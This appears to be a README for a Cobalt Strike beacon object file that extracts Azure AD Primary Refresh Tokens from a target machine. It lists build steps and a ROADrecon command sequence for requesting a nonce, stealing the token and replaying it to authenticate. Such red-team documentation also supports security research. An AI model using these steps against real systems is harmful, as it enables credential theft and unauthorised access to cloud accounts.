Awesome
aad_prt_bof
This bof allows Cobalt Strike to extract Azure AD PRT tokens from the machine. These tokens can then be used with tools like ROADTools to extract AAD information.
How to compile
make
for the beacon object files
make test
for an executable
Usage
After compiling, load the aadprt.cna
file into Cobalt Strike.
- Request a nonce using ROADrecon:
roadrecon auth --prt-init
- Request a token on the target machine:
aadprt [NONCE]
- Use the token to authenticate in ROADrecon (or any other tool):
roadrecon auth --prt-cookie [TOKEN]
- Profit!
References
Heavily inspired by the awesome work and research of Dirk-jan and Lee.